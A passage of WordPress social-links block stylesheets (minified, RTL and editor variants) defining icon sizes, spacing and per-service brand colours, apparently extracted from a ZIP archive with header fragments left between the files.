.wp-social-link{padding-left:.66667em;padding-right:.66667em}.is-style-logos-only .wp-block-social-links__social-placeholder .wp-social-link{padding:0}.wp-block-social-links__social-placeholder .wp-social-link:before{border-radius:50%;content:"";display:block;height:1em;width:1em}.is-style-logos-only .wp-block-social-links__social-placeholder .wp-social-link:before{background:currentColor}.wp-block-social-links .wp-block-social-links__social-prompt{cursor:default;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;line-height:24px;list-style:none;margin-bottom:auto;margin-top:auto;min-height:24px;order:2;padding-right:8px}.wp-block.wp-block-social-links.aligncenter,.wp-block[data-align=center]>.wp-block-social-links{justify-content:center}.block-editor-block-preview__content .components-button:disabled{opacity:1}.wp-social-link.wp-social-link__is-incomplete{opacity:.5}@media (prefers-reduced-motion:reduce){.wp-social-link.wp-social-link__is-incomplete{transition-delay:0s;transition-duration:0s}}.wp-block-social-links .is-selected .wp-social-link__is-incomplete,.wp-social-link.wp-social-link__is-incomplete:focus,.wp-social-link.wp-social-link__is-incomplete:hover{opacity:1}PK6[T((social-links/style-rtl.min.cssnu[.wp-block-social-links{background:none;box-sizing:border-box;margin-right:0;padding-left:0;padding-right:0;text-indent:0}.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-link a:hover{border-bottom:0;box-shadow:none;text-decoration:none}.wp-block-social-links .wp-social-link a{padding:.25em}.wp-block-social-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-huge-icon-size{font-size:48px}.wp-block-social-links.aligncenter{display:flex;justify-content:center}.wp-block-social-links.alignright{justify-content:flex-end}.wp-block-social-link{border-radius:9999px;display:block;height:auto;transition:transform .1s ease}@media (prefers-reduced-motion:reduce){.wp-block-social-link{transition-delay:0s;transition-duration:0s}}.wp-block-social-link a{align-items:center;display:flex;line-height:0;transition:transform .1s ease}.wp-block-social-link:hover{transform:scale(1.1)}.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor svg,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor:active,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor:visited{fill:currentColor;color:currentColor}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link{background-color:#f0f0f0;color:#444}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-amazon{background-color:#f90;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-bandcamp{background-color:#1ea0c3;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-behance{background-color:#0757fe;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-codepen{background-color:#1e1f26;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-deviantart{background-color:#02e49b;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-dribbble{background-color:#e94c89;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-dropbox{background-color:#4280ff;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-etsy{background-color:#f45800;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-facebook{background-color:#1778f2;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-fivehundredpx{background-color:#000;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-flickr{background-color:#0461dd;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-foursquare{background-color:#e65678;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-github{background-color:#24292d;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-goodreads{background-color:#eceadd;color:#382110}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-google{background-color:#ea4434;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-instagram{background-color:#f00075;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-lastfm{background-color:#e21b24;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-linkedin{background-color:#0d66c2;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-mastodon{background-color:#3288d4;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-medium{background-color:#02ab6c;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-meetup{background-color:#f6405f;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-patreon{background-color:#ff424d;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-pinterest{background-color:#e60122;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-pocket{background-color:#ef4155;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-reddit{background-color:#ff4500;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-skype{background-color:#0478d7;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-snapchat{stroke:#000;background-color:#fefc00;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-soundcloud{background-color:#ff5600;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-spotify{background-color:#1bd760;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-telegram{background-color:#2aabee;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-threads,.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-tiktok{background-color:#000;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-tumblr{background-color:#011835;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-twitch{background-color:#6440a4;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-twitter{background-color:#1da1f2;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-vimeo{background-color:#1eb7ea;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-vk{background-color:#4680c2;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-wordpress{background-color:#3499cd;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-whatsapp{background-color:#25d366;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-x{background-color:#000;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-yelp{background-color:#d32422;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-youtube{background-color:red;color:#fff}.wp-block-social-links.is-style-logos-only .wp-social-link{background:none}.wp-block-social-links.is-style-logos-only .wp-social-link a{padding:0}.wp-block-social-links.is-style-logos-only .wp-social-link svg{height:1.25em;width:1.25em}.wp-block-social-links.is-style-logos-only .wp-social-link-amazon{color:#f90}.wp-block-social-links.is-style-logos-only .wp-social-link-bandcamp{color:#1ea0c3}.wp-block-social-links.is-style-logos-only .wp-social-link-behance{color:#0757fe}.wp-block-social-links.is-style-logos-only .wp-social-link-codepen{color:#1e1f26}.wp-block-social-links.is-style-logos-only .wp-social-link-deviantart{color:#02e49b}.wp-block-social-links.is-style-logos-only .wp-social-link-dribbble{color:#e94c89}.wp-block-social-links.is-style-logos-only .wp-social-link-dropbox{color:#4280ff}.wp-block-social-links.is-style-logos-only .wp-social-link-etsy{color:#f45800}.wp-block-social-links.is-style-logos-only .wp-social-link-facebook{color:#1778f2}.wp-block-social-links.is-style-logos-only .wp-social-link-fivehundredpx{color:#000}.wp-block-social-links.is-style-logos-only .wp-social-link-flickr{color:#0461dd}.wp-block-social-links.is-style-logos-only .wp-social-link-foursquare{color:#e65678}.wp-block-social-links.is-style-logos-only .wp-social-link-github{color:#24292d}.wp-block-social-links.is-style-logos-only .wp-social-link-goodreads{color:#382110}.wp-block-social-links.is-style-logos-only .wp-social-link-google{color:#ea4434}.wp-block-social-links.is-style-logos-only .wp-social-link-instagram{color:#f00075}.wp-block-social-links.is-style-logos-only .wp-social-link-lastfm{color:#e21b24}.wp-block-social-links.is-style-logos-only .wp-social-link-linkedin{color:#0d66c2}.wp-block-social-links.is-style-logos-only .wp-social-link-mastodon{color:#3288d4}.wp-block-social-links.is-style-logos-only .wp-social-link-medium{color:#02ab6c}.wp-block-social-links.is-style-logos-only .wp-social-link-meetup{color:#f6405f}.wp-block-social-links.is-style-logos-only .wp-social-link-patreon{color:#ff424d}.wp-block-social-links.is-style-logos-only .wp-social-link-pinterest{color:#e60122}.wp-block-social-links.is-style-logos-only .wp-social-link-pocket{color:#ef4155}.wp-block-social-links.is-style-logos-only .wp-social-link-reddit{color:#ff4500}.wp-block-social-links.is-style-logos-only .wp-social-link-skype{color:#0478d7}.wp-block-social-links.is-style-logos-only .wp-social-link-snapchat{stroke:#000;color:#fff}.wp-block-social-links.is-style-logos-only .wp-social-link-soundcloud{color:#ff5600}.wp-block-social-links.is-style-logos-only .wp-social-link-spotify{color:#1bd760}.wp-block-social-links.is-style-logos-only .wp-social-link-telegram{color:#2aabee}.wp-block-social-links.is-style-logos-only .wp-social-link-threads,.wp-block-social-links.is-style-logos-only .wp-social-link-tiktok{color:#000}.wp-block-social-links.is-style-logos-only .wp-social-link-tumblr{color:#011835}.wp-block-social-links.is-style-logos-only .wp-social-link-twitch{color:#6440a4}.wp-block-social-links.is-style-logos-only .wp-social-link-twitter{color:#1da1f2}.wp-block-social-links.is-style-logos-only .wp-social-link-vimeo{color:#1eb7ea}.wp-block-social-links.is-style-logos-only .wp-social-link-vk{color:#4680c2}.wp-block-social-links.is-style-logos-only .wp-social-link-whatsapp{color:#25d366}.wp-block-social-links.is-style-logos-only .wp-social-link-wordpress{color:#3499cd}.wp-block-social-links.is-style-logos-only .wp-social-link-x{color:#000}.wp-block-social-links.is-style-logos-only .wp-social-link-yelp{color:#d32422}.wp-block-social-links.is-style-logos-only .wp-social-link-youtube{color:red}.wp-block-social-links.is-style-pill-shape .wp-social-link{width:auto}.wp-block-social-links.is-style-pill-shape .wp-social-link a{padding-left:.66667em;padding-right:.66667em}.wp-block-social-links:not(.has-icon-color):not(.has-icon-background-color) .wp-social-link-snapchat .wp-block-social-link-label{color:#000}PK6[@Hksocial-links/editor.cssnu[.wp-block-social-links div.block-editor-url-input{ display:inline-block; margin-left:8px; } .wp-block-social-links.wp-block-social-links{ background:none; } .wp-social-link:hover{ transform:none; } .editor-styles-wrapper .wp-block-social-links{ padding:0; } .wp-block-social-links__social-placeholder{ display:flex; list-style:none; opacity:.8; } .wp-block-social-links__social-placeholder>.wp-social-link{ margin-left:0 !important; margin-right:0 !important; padding-left:0 !important; padding-right:0 !important; visibility:hidden; width:0 !important; } .wp-block-social-links__social-placeholder>.wp-block-social-links__social-placeholder-icons{ display:flex; } .wp-block-social-links__social-placeholder .wp-social-link{ padding:.25em; } .is-style-pill-shape .wp-block-social-links__social-placeholder .wp-social-link{ padding-left:.66667em; padding-right:.66667em; } .is-style-logos-only .wp-block-social-links__social-placeholder .wp-social-link{ padding:0; } .wp-block-social-links__social-placeholder .wp-social-link:before{ border-radius:50%; content:""; display:block; height:1em; width:1em; } .is-style-logos-only .wp-block-social-links__social-placeholder .wp-social-link:before{ background:currentColor; } .wp-block-social-links .wp-block-social-links__social-prompt{ cursor:default; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; line-height:24px; list-style:none; margin-bottom:auto; margin-top:auto; min-height:24px; order:2; padding-right:8px; } .wp-block.wp-block-social-links.aligncenter,.wp-block[data-align=center]>.wp-block-social-links{ justify-content:center; } .block-editor-block-preview__content .components-button:disabled{ opacity:1; } .wp-social-link.wp-social-link__is-incomplete{ opacity:.5; } @media (prefers-reduced-motion:reduce){ .wp-social-link.wp-social-link__is-incomplete{ transition-delay:0s; transition-duration:0s; } } .wp-block-social-links .is-selected .wp-social-link__is-incomplete,.wp-social-link.wp-social-link__is-incomplete:focus,.wp-social-link.wp-social-link__is-incomplete:hover{ opacity:1; }PK6[d/((social-links/style.min.cssnu[.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;text-indent:0}.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-link a:hover{border-bottom:0;box-shadow:none;text-decoration:none}.wp-block-social-links .wp-social-link a{padding:.25em}.wp-block-social-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-huge-icon-size{font-size:48px}.wp-block-social-links.aligncenter{display:flex;justify-content:center}.wp-block-social-links.alignright{justify-content:flex-end}.wp-block-social-link{border-radius:9999px;display:block;height:auto;transition:transform .1s ease}@media (prefers-reduced-motion:reduce){.wp-block-social-link{transition-delay:0s;transition-duration:0s}}.wp-block-social-link a{align-items:center;display:flex;line-height:0;transition:transform .1s ease}.wp-block-social-link:hover{transform:scale(1.1)}.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor svg,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor:active,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor:visited{fill:currentColor;color:currentColor}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link{background-color:#f0f0f0;color:#444}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-amazon{background-color:#f90;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-bandcamp{background-color:#1ea0c3;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-behance{background-color:#0757fe;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-codepen{background-color:#1e1f26;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-deviantart{background-color:#02e49b;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-dribbble{background-color:#e94c89;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-dropbox{background-color:#4280ff;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-etsy{background-color:#f45800;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-facebook{background-color:#1778f2;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-fivehundredpx{background-color:#000;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-flickr{background-color:#0461dd;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-foursquare{background-color:#e65678;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-github{background-color:#24292d;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-goodreads{background-color:#eceadd;color:#382110}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-google{background-color:#ea4434;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-instagram{background-color:#f00075;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-lastfm{background-color:#e21b24;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-linkedin{background-color:#0d66c2;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-mastodon{background-color:#3288d4;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-medium{background-color:#02ab6c;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-meetup{background-color:#f6405f;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-patreon{background-color:#ff424d;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-pinterest{background-color:#e60122;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-pocket{background-color:#ef4155;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-reddit{background-color:#ff4500;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-skype{background-color:#0478d7;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-snapchat{stroke:#000;background-color:#fefc00;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-soundcloud{background-color:#ff5600;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-spotify{background-color:#1bd760;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-telegram{background-color:#2aabee;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-threads,.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-tiktok{background-color:#000;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-tumblr{background-color:#011835;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-twitch{background-color:#6440a4;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-twitter{background-color:#1da1f2;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-vimeo{background-color:#1eb7ea;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-vk{background-color:#4680c2;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-wordpress{background-color:#3499cd;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-whatsapp{background-color:#25d366;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-x{background-color:#000;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-yelp{background-color:#d32422;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-youtube{background-color:red;color:#fff}.wp-block-social-links.is-style-logos-only .wp-social-link{background:none}.wp-block-social-links.is-style-logos-only .wp-social-link a{padding:0}.wp-block-social-links.is-style-logos-only .wp-social-link svg{height:1.25em;width:1.25em}.wp-block-social-links.is-style-logos-only .wp-social-link-amazon{color:#f90}.wp-block-social-links.is-style-logos-only .wp-social-link-bandcamp{color:#1ea0c3}.wp-block-social-links.is-style-logos-only .wp-social-link-behance{color:#0757fe}.wp-block-social-links.is-style-logos-only .wp-social-link-codepen{color:#1e1f26}.wp-block-social-links.is-style-logos-only .wp-social-link-deviantart{color:#02e49b}.wp-block-social-links.is-style-logos-only .wp-social-link-dribbble{color:#e94c89}.wp-block-social-links.is-style-logos-only .wp-social-link-dropbox{color:#4280ff}.wp-block-social-links.is-style-logos-only .wp-social-link-etsy{color:#f45800}.wp-block-social-links.is-style-logos-only .wp-social-link-facebook{color:#1778f2}.wp-block-social-links.is-style-logos-only .wp-social-link-fivehundredpx{color:#000}.wp-block-social-links.is-style-logos-only .wp-social-link-flickr{color:#0461dd}.wp-block-social-links.is-style-logos-only .wp-social-link-foursquare{color:#e65678}.wp-block-social-links.is-style-logos-only .wp-social-link-github{color:#24292d}.wp-block-social-links.is-style-logos-only .wp-social-link-goodreads{color:#382110}.wp-block-social-links.is-style-logos-only .wp-social-link-google{color:#ea4434}.wp-block-social-links.is-style-logos-only .wp-social-link-instagram{color:#f00075}.wp-block-social-links.is-style-logos-only .wp-social-link-lastfm{color:#e21b24}.wp-block-social-links.is-style-logos-only .wp-social-link-linkedin{color:#0d66c2}.wp-block-social-links.is-style-logos-only .wp-social-link-mastodon{color:#3288d4}.wp-block-social-links.is-style-logos-only .wp-social-link-medium{color:#02ab6c}.wp-block-social-links.is-style-logos-only .wp-social-link-meetup{color:#f6405f}.wp-block-social-links.is-style-logos-only .wp-social-link-patreon{color:#ff424d}.wp-block-social-links.is-style-logos-only .wp-social-link-pinterest{color:#e60122}.wp-block-social-links.is-style-logos-only .wp-social-link-pocket{color:#ef4155}.wp-block-social-links.is-style-logos-only .wp-social-link-reddit{color:#ff4500}.wp-block-social-links.is-style-logos-only .wp-social-link-skype{color:#0478d7}.wp-block-social-links.is-style-logos-only .wp-social-link-snapchat{stroke:#000;color:#fff}.wp-block-social-links.is-style-logos-only .wp-social-link-soundcloud{color:#ff5600}.wp-block-social-links.is-style-logos-only .wp-social-link-spotify{color:#1bd760}.wp-block-social-links.is-style-logos-only .wp-social-link-telegram{color:#2aabee}.wp-block-social-links.is-style-logos-only .wp-social-link-threads,.wp-block-social-links.is-style-logos-only .wp-social-link-tiktok{color:#000}.wp-block-social-links.is-style-logos-only .wp-social-link-tumblr{color:#011835}.wp-block-social-links.is-style-logos-only .wp-social-link-twitch{color:#6440a4}.wp-block-social-links.is-style-logos-only .wp-social-link-twitter{color:#1da1f2}.wp-block-social-links.is-style-logos-only .wp-social-link-vimeo{color:#1eb7ea}.wp-block-social-links.is-style-logos-only .wp-social-link-vk{color:#4680c2}.wp-block-social-links.is-style-logos-only .wp-social-link-whatsapp{color:#25d366}.wp-block-social-links.is-style-logos-only .wp-social-link-wordpress{color:#3499cd}.wp-block-social-links.is-style-logos-only .wp-social-link-x{color:#000}.wp-block-social-links.is-style-logos-only .wp-social-link-yelp{color:#d32422}.wp-block-social-links.is-style-logos-only .wp-social-link-youtube{color:red}.wp-block-social-links.is-style-pill-shape .wp-social-link{width:auto}.wp-block-social-links.is-style-pill-shape .wp-social-link a{padding-left:.66667em;padding-right:.66667em}.wp-block-social-links:not(.has-icon-color):not(.has-icon-background-color) .wp-social-link-snapchat .wp-block-social-link-label{color:#000}PK6[gUsocial-links/editor-rtl.cssnu[.wp-block-social-links div.block-editor-url-input{ display:inline-block; margin-right:8px; } .wp-block-social-links.wp-block-social-links{ background:none; } .wp-social-link:hover{ transform:none; } .editor-styles-wrapper .wp-block-social-links{ padding:0; } .wp-block-social-links__social-placeholder{ display:flex; list-style:none; opacity:.8; } .wp-block-social-links__social-placeholder>.wp-social-link{ margin-left:0 !important; margin-right:0 !important; padding-left:0 !important; padding-right:0 !important; visibility:hidden; width:0 !important; } .wp-block-social-links__social-placeholder>.wp-block-social-links__social-placeholder-icons{ display:flex; } .wp-block-social-links__social-placeholder .wp-social-link{ padding:.25em; } .is-style-pill-shape .wp-block-social-links__social-placeholder .wp-social-link{ padding-left:.66667em; padding-right:.66667em; } .is-style-logos-only .wp-block-social-links__social-placeholder .wp-social-link{ padding:0; } .wp-block-social-links__social-placeholder .wp-social-link:before{ border-radius:50%; content:""; display:block; height:1em; width:1em; } .is-style-logos-only .wp-block-social-links__social-placeholder .wp-social-link:before{ background:currentColor; } .wp-block-social-links .wp-block-social-links__social-prompt{ cursor:default; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; line-height:24px; list-style:none; margin-bottom:auto; margin-top:auto; min-height:24px; order:2; padding-left:8px; } .wp-block.wp-block-social-links.aligncenter,.wp-block[data-align=center]>.wp-block-social-links{ justify-content:center; } .block-editor-block-preview__content .components-button:disabled{ opacity:1; } .wp-social-link.wp-social-link__is-incomplete{ opacity:.5; } @media (prefers-reduced-motion:reduce){ .wp-social-link.wp-social-link__is-incomplete{ transition-delay:0s; transition-duration:0s; } } .wp-block-social-links .is-selected .wp-social-link__is-incomplete,.wp-social-link.wp-social-link__is-incomplete:focus,.wp-social-link.wp-social-link__is-incomplete:hover{ opacity:1; }PK6[0social-links/editor-rtl.min.cssnu[.wp-block-social-links div.block-editor-url-input{display:inline-block;margin-right:8px}.wp-block-social-links.wp-block-social-links{background:none}.wp-social-link:hover{transform:none}.editor-styles-wrapper .wp-block-social-links{padding:0}.wp-block-social-links__social-placeholder{display:flex;list-style:none;opacity:.8}.wp-block-social-links__social-placeholder>.wp-social-link{margin-left:0!important;margin-right:0!important;padding-left:0!important;padding-right:0!important;visibility:hidden;width:0!important}.wp-block-social-links__social-placeholder>.wp-block-social-links__social-placeholder-icons{display:flex}.wp-block-social-links__social-placeholder .wp-social-link{padding:.25em}.is-style-pill-shape .wp-block-social-links__social-placeholder .wp-social-link{padding-left:.66667em;padding-right:.66667em}.is-style-logos-only .wp-block-social-links__social-placeholder .wp-social-link{padding:0}.wp-block-social-links__social-placeholder .wp-social-link:before{border-radius:50%;content:"";display:block;height:1em;width:1em}.is-style-logos-only .wp-block-social-links__social-placeholder .wp-social-link:before{background:currentColor}.wp-block-social-links .wp-block-social-links__social-prompt{cursor:default;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;line-height:24px;list-style:none;margin-bottom:auto;margin-top:auto;min-height:24px;order:2;padding-left:8px}.wp-block.wp-block-social-links.aligncenter,.wp-block[data-align=center]>.wp-block-social-links{justify-content:center}.block-editor-block-preview__content .components-button:disabled{opacity:1}.wp-social-link.wp-social-link__is-incomplete{opacity:.5}@media (prefers-reduced-motion:reduce){.wp-social-link.wp-social-link__is-incomplete{transition-delay:0s;transition-duration:0s}}.wp-block-social-links .is-selected .wp-social-link__is-incomplete,.wp-social-link.wp-social-link__is-incomplete:focus,.wp-social-link.wp-social-link__is-incomplete:hover{opacity:1}PK6[QJ+J+social-links/style-rtl.cssnu[.wp-block-social-links{ background:none; box-sizing:border-box; margin-right:0; padding-left:0; padding-right:0; text-indent:0; } .wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-link a:hover{ border-bottom:0; box-shadow:none; text-decoration:none; } .wp-block-social-links .wp-social-link a{ padding:.25em; } .wp-block-social-links .wp-social-link svg{ height:1em; width:1em; } .wp-block-social-links .wp-social-link span:not(.screen-reader-text){ font-size:.65em; margin-left:.5em; margin-right:.5em; } .wp-block-social-links.has-small-icon-size{ font-size:16px; } .wp-block-social-links,.wp-block-social-links.has-normal-icon-size{ font-size:24px; } .wp-block-social-links.has-large-icon-size{ font-size:36px; } .wp-block-social-links.has-huge-icon-size{ font-size:48px; } .wp-block-social-links.aligncenter{ display:flex; justify-content:center; } .wp-block-social-links.alignright{ justify-content:flex-end; } .wp-block-social-link{ border-radius:9999px; display:block; height:auto; transition:transform .1s ease; } @media (prefers-reduced-motion:reduce){ .wp-block-social-link{ transition-delay:0s; transition-duration:0s; } } .wp-block-social-link a{ align-items:center; display:flex; line-height:0; transition:transform .1s ease; } .wp-block-social-link:hover{ transform:scale(1.1); } .wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor svg,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor:active,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor:visited{ fill:currentColor; color:currentColor; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link{ background-color:#f0f0f0; color:#444; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-amazon{ background-color:#f90; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-bandcamp{ background-color:#1ea0c3; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-behance{ background-color:#0757fe; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-codepen{ background-color:#1e1f26; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-deviantart{ background-color:#02e49b; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-dribbble{ background-color:#e94c89; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-dropbox{ background-color:#4280ff; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-etsy{ background-color:#f45800; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-facebook{ background-color:#1778f2; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-fivehundredpx{ background-color:#000; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-flickr{ background-color:#0461dd; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-foursquare{ background-color:#e65678; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-github{ background-color:#24292d; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-goodreads{ background-color:#eceadd; color:#382110; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-google{ background-color:#ea4434; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-instagram{ background-color:#f00075; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-lastfm{ background-color:#e21b24; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-linkedin{ background-color:#0d66c2; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-mastodon{ background-color:#3288d4; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-medium{ background-color:#02ab6c; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-meetup{ background-color:#f6405f; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-patreon{ background-color:#ff424d; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-pinterest{ background-color:#e60122; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-pocket{ background-color:#ef4155; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-reddit{ background-color:#ff4500; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-skype{ background-color:#0478d7; color:#fff; } 